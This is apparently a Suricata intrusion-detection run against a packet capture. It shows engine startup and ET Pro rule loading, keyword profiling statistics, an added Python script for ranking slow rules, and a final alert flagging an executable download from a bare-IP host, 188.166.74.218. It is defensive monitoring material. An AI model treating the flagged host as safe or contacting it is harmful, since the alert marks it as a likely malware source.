1/5/2019 -- 14:35:19 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
1/5/2019 -- 14:35:19 - <Config> - using magic-file /usr/share/file/magic
1/5/2019 -- 14:35:19 - <Config> - Core dump size is unlimited.
1/5/2019 -- 14:35:19 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
1/5/2019 -- 14:35:19 - <Config> - preallocated 1000 defrag trackers of size 168
1/5/2019 -- 14:35:19 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
1/5/2019 -- 14:35:19 - <Config> - stream "prealloc-sessions": 2048 (per thread)
1/5/2019 -- 14:35:19 - <Config> - stream "memcap": 33554432
1/5/2019 -- 14:35:19 - <Config> - stream "midstream" session pickups: disabled
1/5/2019 -- 14:35:19 - <Config> - stream "async-oneside": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "checksum-validation": disabled
1/5/2019 -- 14:35:19 - <Config> - stream."inline": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "bypass": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "max-synack-queued": 5
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "memcap": 134217728
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "depth": 0
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "toserver-chunk-size": 2640
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "toclient-chunk-size": 2605
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly.raw: enabled
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "segment-prealloc": 2048
1/5/2019 -- 14:35:19 - <Config> - Delayed detect disabled
1/5/2019 -- 14:35:19 - <Config> - pattern matchers: MPM: ac, SPM: bm
1/5/2019 -- 14:35:19 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
1/5/2019 -- 14:35:19 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
1/5/2019 -- 14:35:19 - <Config> - prefilter engines: MPM
1/5/2019 -- 14:35:19 - <Config> - IP reputation disabled
1/5/2019 -- 14:35:19 - <Perf> - Registered 148 keyword profiling counters.
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
1/5/2019 -- 14:35:24 - <Config> - No rules loaded from ET-icmp.rules.
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
1/5/2019 -- 14:35:32 - <Config> - No rules loaded from local.rules.
1/5/2019 -- 14:35:32 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
1/5/2019 -- 14:35:32 - <Info> - Threshold config parsed: 0 rule(s) found
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tcp-packet
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tcp-stream
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for udp-packet
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for other-ip
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_uri
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_request_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_client_body
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_response_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header_names
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header_names
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept_enc
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept_lang
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_referer
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_connection
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_len
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_len
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_type
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_type
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_start
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_start
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_method
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_cookie
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_cookie
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_uri
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_user_agent
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_host
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_host
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_stat_msg
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_stat_code
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dns_query
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_sni
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_issuer
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_subject
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_serial
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dce_stub_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dce_stub_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_software
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_software
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for file_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for file_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_request_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_response_line
1/5/2019 -- 14:35:33 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
1/5/2019 -- 14:35:33 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
1/5/2019 -- 14:35:33 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
1/5/2019 -- 14:35:33 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
1/5/2019 -- 14:35:33 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
1/5/2019 -- 14:35:33 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
1/5/2019 -- 14:35:33 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
1/5/2019 -- 14:35:33 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
1/5/2019 -- 14:35:38 - <Perf> - Unique rule groups: 104
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver TCP packet": 35
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient TCP packet": 17
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver TCP stream": 33
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient TCP stream": 19
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver UDP packet": 27
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient UDP packet": 17
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "other IP packet": 3
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_uri": 14
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_request_line": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_client_body": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_response_line": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_header": 10
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_header": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_header_names": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_accept": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_referer": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_content_len": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_content_type": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_content_type": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_protocol": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_start": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_method": 5
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_cookie": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_cookie": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_host": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver dns_query": 4
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver tls_sni": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver file_data": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient file_data": 7
1/5/2019 -- 14:35:40 - <Perf> - Registered 39590 rule profiling counters.
1/5/2019 -- 14:35:40 - <Info> - fast output device (regular) initialized: alert
1/5/2019 -- 14:35:40 - <Info> - eve-log output device (regular) initialized: eve.json
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'alert'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'http'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'dns'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'tls'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'files'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'ssh'
1/5/2019 -- 14:35:40 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
1/5/2019 -- 14:35:40 - <Info> - stats output device (regular) initialized: stats.log
1/5/2019 -- 14:35:40 - <Config> - AutoFP mode using "Hash" flow load balancer
1/5/2019 -- 14:35:40 - <Info> - reading pcap file /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap
1/5/2019 -- 14:35:40 - <Config> - using 1 flow manager threads
1/5/2019 -- 14:35:40 - <Config> - using 1 flow recycler threads
1/5/2019 -- 14:35:40 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engin

This file has been truncated.


keyword_perf.log - (15746 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 5/1/2019 -- 14:35:42
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9296095         2871            2871            385916          3237.00         3237.00         0.00           
  content          23434739        1687            537             499094          13891.00        19751.00        11154.00       
  pcre             21792486        123             18              20804320        177174.00       1161347.00      8459.00        
  byte_test        968476          289             81              32764           3351.00         3245.00         3392.00        
  byte_jump        126940          42              30              4803            3022.00         3042.00         2972.00        
  isdataat         5671            2               1               2838            2835.00         2838.00         2833.00        
  flowbits         4864145         1691            26              30669           2876.00         3320.00         2869.00        
  urilen           183892          57              13              4174            3226.00         3249.00         3219.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9296095         2871            2871            385916          3237.00         3237.00         0.00           
  flowbits         4847463         1688            23              30669           2871.00         3028.00         2869.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          9179390         710             224             88818           12928.00        15835.00        11588.00       
  pcre             39186           3               1               26641           13062.00        8014.00         15586.00       
  byte_test        968476          289             81              32764           3351.00         3245.00         3392.00        
  byte_jump        108331          36              24              4803            3009.00         3027.00         2972.00        
  isdataat         5671            2               1               2838            2835.00         2838.00         2833.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         16682           3               3               7116            5560.00         5560.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          243345          62              36              7274            3924.00         3931.00         3915.00        
  pcre             20962943        29              4               20804320        722860.00       5204838.00      5743.00        
  urilen           183892          57              13              4174            3226.00         3249.00         3219.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6997            2               2               4394            3498.00         3498.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7160            2               0               3701            3580.00         0.00            3580.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13026702        691             129             499094          18851.00        48396.00        12070.00       
  pcre             279998          70              0               27243           3999.00         0.00            3999.00        
  byte_jump        18609           6               6               4118            3101.00         3101.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          569162          119             79              29546           4782.00         4896.00         4558.00        
  pcre             83362           14              8               10670           5954.00         5854.00         6088.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          127448          33              22              5096            3862.00         3899.00         3787.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3553            1               1               3553            3553.00         3553.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3065            1               1               3065            3065.00         3065.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3208            1               1               3208            3208.00         3208.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5112            1               0               5112            5112.00         0.00            5112.00        
  pcre             390459          1               0               390459          390459.00       0.00            390459.00      
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27797           7               5               4544            3971.00         4063.00         3740.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          198570          47              28              17487           4224.00         4823.00         3343.00        
  pcre             19914           4               4               5260            4978.00         4978.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          22079           7               7               3478            3154.00         3154.00         0.00           
  pcre             16624           2               1               10144           8312.00         10144.00        6480.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3140            1               0               3140            3140.00         0.00            3140.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8011            2               2               4034            4005.00         4005.00         0.00           
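The tables above are Suricata's per-keyword profiling output (written when the engine is built with `--enable-profiling`). The column worth reading first is Max Ticks against Ticks: in the `http_uri` section a single `pcre` check cost 20,804,320 ticks, which is 99% of all ticks that keyword consumed in that buffer, while `content` in the same buffer averaged under 4,000 ticks per check. That is the signature of one rule with a pathological regex, not of a slow keyword in general. The following parser and ranking helpers are an added example, not part of the page or of Suricata; the sample log is a constructed, trimmed copy of the `total` and `http_uri` sections shown above, embedded so the script runs offline, and the 0.5 share threshold in `single_check_dominated` is an assumed heuristic, not a Suricata setting.

```python
"""Rank Suricata keyword_perf.log entries to find the rules worth tuning.

Added example, not part of the page or of Suricata. It parses the layout shown
above: a 'Stats for: <section>' header followed by a Keyword/Ticks/Checks/... table.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample: a trimmed copy of the "total" and "http_uri" sections
# shown on this page, embedded so the example runs offline.
SAMPLE_LOG = """\
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 5/1/2019 -- 14:35:42
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9296095         2871            2871            385916          3237.00         3237.00         0.00           
  content          23434739        1687            537             499094          13891.00        19751.00        11154.00       
  pcre             21792486        123             18              20804320        177174.00       1161347.00      8459.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          243345          62              36              7274            3924.00         3931.00         3915.00        
  pcre             20962943        29              4               20804320        722860.00       5204838.00      5743.00        
  urilen           183892          57              13              4174            3226.00         3249.00         3219.00        
"""


class KeywordStat(NamedTuple):
    section: str       # the "Stats for:" header: total, packet, http_uri, ...
    keyword: str
    ticks: int         # total CPU ticks spent in this keyword for this buffer
    checks: int
    matches: int
    max_ticks: int     # cost of the single most expensive check
    avg: float
    avg_match: float
    avg_no_match: float


# One data row: a keyword, four integer columns, three float columns.
ROW_RE = re.compile(
    r"^\s*(?P<kw>[a-z_]+)\s+(?P<ticks>\d+)\s+(?P<checks>\d+)\s+(?P<matches>\d+)\s+"
    r"(?P<max>\d+)\s+(?P<avg>[\d.]+)\s+(?P<avg_m>[\d.]+)\s+(?P<avg_nm>[\d.]+)\s*$"
)


def parse_keyword_perf(text: str) -> List[KeywordStat]:
    """Parse every 'Stats for:' section of a keyword_perf.log dump into rows."""
    section: Optional[str] = None
    rows: List[KeywordStat] = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Stats for:"):
            section = stripped.split(":", 1)[1].strip()
            continue
        # Skip separators, the column header and anything before the first section.
        if section is None or stripped.startswith(("Keyword", "---", "Date")):
            continue
        m = ROW_RE.match(line)
        if m:
            rows.append(KeywordStat(
                section, m["kw"], int(m["ticks"]), int(m["checks"]), int(m["matches"]),
                int(m["max"]), float(m["avg"]), float(m["avg_m"]), float(m["avg_nm"])))
    return rows


def hotspots(rows: List[KeywordStat], section: str = "total",
             top: int = 3) -> List[Tuple[str, int, float]]:
    """Costliest keywords in one section as (keyword, ticks, share of section ticks)."""
    sec = [r for r in rows if r.section == section]
    total = sum(r.ticks for r in sec) or 1
    ranked = sorted(sec, key=lambda r: r.ticks, reverse=True)[:top]
    return [(r.keyword, r.ticks, round(r.ticks / total, 3)) for r in ranked]


def single_check_dominated(rows: List[KeywordStat],
                           share: float = 0.5) -> List[Tuple[str, str]]:
    """(section, keyword) pairs where ONE check accounts for more than `share`
    of that keyword's ticks.  A uniformly slow keyword has max_ticks close to
    its average; a single pathological regex has max_ticks close to the total,
    which is what the pcre rows above show.  The 0.5 threshold is an assumption."""
    return sorted((r.section, r.keyword) for r in rows
                  if r.ticks and r.max_ticks / r.ticks > share)


if __name__ == "__main__":
    stats = parse_keyword_perf(SAMPLE_LOG)
    for kw, ticks, pct in hotspots(stats):
        print(f"total  {kw:<10} {ticks:>10} ticks  {pct:.1%}")
    print("one check dominates:", single_check_dominated(stats))
```

Run against a full keyword_perf.log, the `single_check_dominated` list is the shortlist of buffers where a single rule's regex should be found (rule_perf.log ranks by signature) and either anchored with a cheaper `content` pre-filter or rewritten, whereas the `hotspots` ranking alone would only say that `content` and `pcre` are expensive, which is true of every ruleset.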


suricata-4.0.0-etpro-all-alert-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt - (1100 bytes)
04/30/2019-02:29:52.179783  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.175:49192 -> 188.166.74.218:80
